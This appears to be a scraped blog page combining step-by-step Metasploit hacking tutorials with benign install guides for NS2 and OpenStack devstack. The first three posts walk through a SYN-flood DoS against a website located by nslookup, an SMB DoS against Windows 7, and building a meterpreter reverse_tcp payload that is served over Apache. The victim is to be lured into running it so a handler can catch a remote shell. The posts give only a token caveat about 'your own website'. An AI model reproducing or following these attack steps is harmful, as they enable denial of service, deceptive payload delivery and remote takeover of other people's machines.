Tech Point

Denial of Service attack on a website using Metasploit Framework

We know that Metasploit framework is having many inbuilt auxiliary modules which will help us in performing different kinds of attacks. One such auxiliary module that we use for DoS attack is TCP SYNFLOOD module. As we all know TCP handshake is three-way, sending a SYN packet in first step, SYN+ACK in the second step and finally ACK in the third step. Here, for DoS attack we are flooding the server with the SYN packets so that it causes Denial of Service.

1. Open msf console (Metasploit Framework Console)
2. msf > use auxiliary/dos/tcp/synflood
3. If you want to see the available options, use the command "show options".
4. Set the target address on which you want to perform the DoS attack.
5. But how do you get the IP address of the website on which you want to perform the attack.
6. Use command nslookup for getting the IP address of the website.
7. Syntax: msf > nslookup abcd.com
8. The above cmd will return the IP address on which the website is running. Use this IP and set the target address.
9. Once you set the target address, use cmd msf > exploit to run the attack.

Voila.... You have successfully learnt DoS attack on a website.

Note:

This attack may not be possible on all the websites as they have their own security monitoring mechanisms. Please note that this is the basic DoS attack that you can try out if you have your own website.

We will learn how to perform a DoS attack on a Windows 7 machine in the coming up post.

Happy Learning...!

Denial of Service (DoS) attack on Windows 7

In my previous post we have seen DoS attack on a website. This post will walk you through some simple steps to launch DoS attack on a Windows 7 machine.

Follow the steps:

a) In this experiment our attacker machine is the kali machine and the victim machine is Windows 7.

b) Open meterpreter which is the console of metasploit framework.

c) It will take some time, and once the console is ready it will show msf> console.

d) There are many auxiliary modules that are already provided by the metasploit framework. We can use these auxiliary modules for performing scanning, sniffing, exploiting etc.

e) Msf > use auxiliary/dos/ this will list down all kinds of DoS attacks that can be performed. Here for DoS on Windows 7 we are using the following attack

Msf > use auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop

f) Msf > show options cmd will list down the options that are available where we can change the target machine address, port numbers, interface numbers etc.

g) Msf > set srvhost=

h) To get your kali machine IP address you can open a terminal and type ifconfig cmd.

i) Doing the step 'g' set the IP address of our kali machine, so that when we do exploit, this attack will generate a URL and displays on our machine.

j) When this URL is accessed from the Windows 7 machines browser the system gets hanged as the responses are looped in an infinite loop. As continuous flooding of packets is done, DoS attack is performed on the machine, making the machine inaccessible.

Voila...! we are done attacking Windows 7.

In the coming post we will see hacking into Windows 7 and obtaining access to shell.

Hacking Windows 7 and obtaining access to the shell (Windows command prompt)

In this session we will learn how to establish a reverse connection from the Windows machine (victim machine) to the Kali machine (attacker machine) using which we can get access to the Windows command prompt.

In Kali (attacker) machine run the following command in the terminal:

>msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.8.91 X>Desktop/payload.exe

The above command will generate the payload necessary for the attack. Here, LHOST will take IP address of the out attacker machine. Once this command is executed successfully on the system, it will generate the payload on our Kali machine Desktop.

Now we have to send this payload file to the victim. i.e. we have to lure the victim such that he runs this particular exe we have generated.

In this attack we are using reverse_tcp exploit which will establish a reverse connection from the server to the client machine, which is based on a simple fact that, a firewall will block all the open ports, but it cannot stop the outgoing traffic through the open ports.

If we are performing the attack on two different Virtual Machines (VMs), you may have to copy the exe file from Kali machine to Windows 7 machine. How to copy is given in the following steps;

1. mkdir /var/www/share
2. chmod -R 755 /var/www/share
3. chown -R www-data:www-data /var/www/share
4. Now the next step is activating Apache server : >service apache2 start
5. Now copy the exe file to the apache server folder : > cp /root/Desktop/* /var/www/share
6. Get the IP address of the Kali machine; in my case it is 192.168.8.91.
7. Now try accessing http://192.168.8.91/share/ from the windows machine. This will list down the files available in shared folder. Click on the payload.exe to download.

Now once the file is copied successfully to the victim machine, open your metasploit console and do the following

> use exploit/multi/handler --this will create the handler for the connection

> set payload windows/meterpreter/reverse_tcp --sets the payload to be reverse_tcp

> set lhost 192.168.8.91 --local IP address that will catch the connection

> exploit -j -z -- starts the exploit and runs it as a background job

Now once the user executes the payload that we copied into the windows machine, it will establish a reverse connection.

To know the information about sessions that are established use the command sessions -l. This will list down all the active sessions. To get access to a particular session with session id 1, use the command sessions -i 1. Once you obtain a session successfully you will get meterpreter> shell.

Now you can use command shell to get access to the windows command prompt of the victims machine.

Voila... we successfully hacked windows 7 and obtained access the command prompt.

Now you can create, delete....do what ever you want on the victim machine.

NS2 Installation Guide

Download and Extract NS2

Download the all in one package for ns2 from here

The package downloaded will be named "ns-allinone-2.35.tar.gz". Copy it to the home folder.

Open Terminal execute the following commands

cd ~/

tar -xvzf ns-allinone-2.35.tar.gz

Building the dependencies

NS2 requires a few packages to be pre installed. It also requires the GCC- version 4.3 to work correctly. So install all of them by using the following command:

sudo apt-get install build-essential autoconf automake libxmu-dev

Also Install the GCC using the command

sudo apt-get install gcc-4.4

Once the installation is over , we have to make a change in the "ls.h" file. Use the following steps to make the changes:

cd ~/ns-allinone-2.35/ns-2.35/linkstate

Now open the file named "ls.h" and scroll to the 137th line. In that change the word "erase" to

"this->erase". To open the file use the following command:

gedit ls.h

Now there is one more step that has to be done. We have to tell the ns which version of GCC will be used. To do so, go to your ns folder and type the following command:

Sudo gedit ns-allinone-2.34/otcl-1.13/Makefile.in

In the file, change CC= @CC@ to CC=gcc-4.4

Installation

sudo su cd ~/ns-allinone-2.35/./install

The above command requires root privileges.

This takes nearly 10 minutes for the installation to finish.

Setting the Environment Path

The final step is to tell the system, where the files for ns2 are installed or present. To do that, we have to set the environment path using the ".bashrc" file. In that file, we need to add a few lines at the bottom.

sudo gedit ~/.bashrc

Lines to be added:

# LD_LIBRARY_PATH

OTCL_LIB=/home/vamsee/ns-allinone-2.35/otcl-1.14

NS2_LIB=/home/vamsee/ns-allinone-2.35/lib

X11_LIB=/usr/X11R6/lib

USR_LOCAL_LIB=/usr/local/lib

export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:$OTCL_LIB:$NS2_LIB:$X11_LIB:$USR_LOCAL_LIB

# TCL_LIBRARY

TCL_LIB=/home/vamsee/ns-allinone-2.35/tcl8.5.10/library

USR_LIB=/usr/lib

export TCL_LIBRARY=$TCL_LIB:$USR_LIB

# PATH

XGRAPH=/home/vamsee/ns-allinone-2.35/bin:/home/vamsee/ns-allinone-2.35/tcl8.5.10/unix:/home/vamsee/ns-allinone-2.35/tk8.5.10/unix

#the above two lines beginning from xgraph and ending with unix should come on the same line

NS=/home/vamsee/ns-allinone-2.35/ns-2.35/

NAM=/home/vamsee/ns-allinone-2.35/nam-1.15/

PATH=$PATH:$XGRAPH:$NS:$NAM

In the above code, I have my home folder as vamsee, please change the path with your home folder name accordingly before you save the file.

Once the bashrc file is saved with above lines added at the end, please restart the system.

After system restart, open terminal and type command

ns

If NS is installed properly it displays a % symbol.

OpenStack Installation step-by-step guide

OpenStack is an open source cloud platform.

I have observed that there is no single website describing the step by step procedure for installing OpenStack Platform.

So, here is the tutorial

This installation is done on Ubuntu 14.04 LTS.

If you don't have that version of Ubuntu you can download it from here.

Installation Steps:

First make sure that all the Ubuntu repositories are up to date.

In order to update do the following command

sudo apt-get update

Once the repositories are updated. You have to install "git"

sudo apt-get install git

In order to install Openstack please make sure that the user account you are signed is not root. You can be any other user with sudo previleges.

If you are a root, you can create a user by doing the following

devstack/tools/create-stack-user.sh; su stack

once the user is created, login into that user.

Get the devstack repository cloned to you machine by executing the following command in your terminal

git clone https://git.openstack.org/openstack-dev/devstack

Once the devstack is cloned to your local system, A folder with name devstack will appear in the

home folder of the system.

Navigate the the devstack by doing

cd devstack

You need to edit the file called stackrc, in order to do that

gedit stackrc

change the lines as mentioned in the below screen shot.

Once the changes are saved you can start the installation.

Start the installation by doing the following

cd devstack

./stack.sh

This will take a while...

When prompted for passwords for various services of OpenStack, give the passwords and please remember them.

Installation will take while, so sit back and relax.